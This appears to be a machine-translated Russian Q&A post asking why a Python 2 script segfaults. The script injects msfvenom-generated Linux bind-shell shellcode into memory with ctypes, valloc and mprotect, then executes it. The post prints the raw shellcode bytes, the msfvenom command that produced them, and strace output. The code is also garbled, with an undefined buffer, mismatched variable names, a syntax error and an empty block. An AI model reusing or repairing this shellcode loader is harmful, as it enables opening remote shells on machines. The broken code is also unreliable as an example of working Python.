Справочная информация:
Написание проверки концепции, которая включает в себя выполнение машинного кода в рамках выполняющегося процесса python.Желание сделать функционал кросс-платформенным, но проблема возникает при тестировании на Unix-системах.
Почти так же, как этот вопрос: Типы Python и вызовы функций , но на этот раз решение не работает.
Проблема : при выполнении сценария python на виртуальной машине 32-битного сервера Ubuntu VM 12.04.5 LTS выводит:
Segmentation fault (core dumped)
Это означает, что мне отказывают в доступе к памятичто у меня нет разрешения на.Это странно, ч / б в исходном коде я также установил cytpes.mprotect (alloc_space, space_size, 7) <== 4 + 2 + 1 для разрешений wrx </p>
ПРИМЕЧАНИЕ: Пожалуйстане пытайтесь выполнить следующий машинный код на машине без полного согласия владельца для тестирования.
Python Script :
#!/usr/bin/env python
import ctypes
import os
import sys
# linux machine code
buf += "\xbd\xfc\xa1\x5d\x63\xd9\xee\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x1c\x31\x6e\x14\x03\x6e\x14\x83\xee\xfc\x1e"
buf += "\x54\x37\x1e\x86\x0e\x7a\xe7\x8f\x31\x6b\xe8\xef\xb8"
buf += "\x68\x8e\x6e\x59\x6e\xbf\xbd\x1e\x5e\xe4\xca\xfc\xf2"
buf += "\x59\x67\x69\xf7\xd4\x66\xdd\x91\x2b\xe8\x4f\x34\xb0"
buf += "\xbc\x05\xca\xd2\x3d\x8a\x5d\xab\xdc\x40\x6c\xf7\x74"
buf += "\xf3\x28\xca\x08\x6c\x4b\x10\x1c\xca\x17\xc7\x4e\x84"
buf += "\xa5\xf7\x7f\x08\xc0\xe7\x2e\xe0\x9d\xe9\xba\x66\xc6"
buf += "\x24\xba\xb6\x15\x06\xdc\xf5\x5a\x37\x63\xb6\x3d\x31"
buf += "\x32\xb2\x0c\xc1\x27\x0c\x82\x72\x44\xbc\x1b\xf5\x95"
buf += "\x65\xac\xfc\xe4\x1a\x33\xe1"
def main(buf):
if os.name == 'posix':
try:
libc = ctypes.CDLL('libc.so.6')
buf_ptr = ctypes.c_char_p(buf)
size = len(buf)
addr_freespace = ctypes.c_void_p(libc.valloc(size))
ctypes.memmove(addr_freespace, buf_ptr, size)
libc.mprotect(addr_free_space, size, 1 | 2 | 4) # changed to 7 for all three access
run = ctypes.cast(free_space, ctypes.CFUNCTYPE(ctypes.c_void_p))
run()
sys.exit()
except Exception as e:
print "Error: " e
else:
try: # windows implementation
if __name__ == '__main__':
main(buf)
Вопрос: Может кто-нибудь объяснить, почему появляется сообщение об ошибке сегментации и как мы можем решить эту проблему?
Кредиты : эта реализация unix возникла на sickle.py @ Line743-753
Единственное отличие заключается в том, что эталонный скрипт использует python 3, а я использую python 2.7.
UPDATE :
Послемного проб и ошибок, в том числе запуск программы в pdb.Ошибка ошибки сегментации произошла после строки:
run()
Может кто-нибудь объяснить, почему это происходит?
Редактировать:
машинный код / шелл-код, сгенерированный с использованием:
msfvenom --payload linux/x86/shell/bind_tcp --format py --arch x86 --bad-char "\x00\x20\x0d"
Этот PoC вдохновлен профессором Viviek из SPSE и twittor
Использование strace для точного определения
результат до ошибки сегментации следующий:
mprotect(0x11ad000, 137, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
capget(0x1, 0, {CAP_CHOWN|CAP_FSETID|CAP_SETGID|CAP_NET_BIND_SERVICE|CAP_SYS_MODULE|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_FSETID|CAP_SETUID|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_OWNER|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_LEASE|CAP_AUDIT_WRITE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_SETPCAP|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_SETFCAP}) = -1 ENOMEM (Cannot allocate memory)
getuid() = -1 EINVAL (Invalid argument)
getuid() = -1 EFAULT (Bad address)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV (core dumped) +++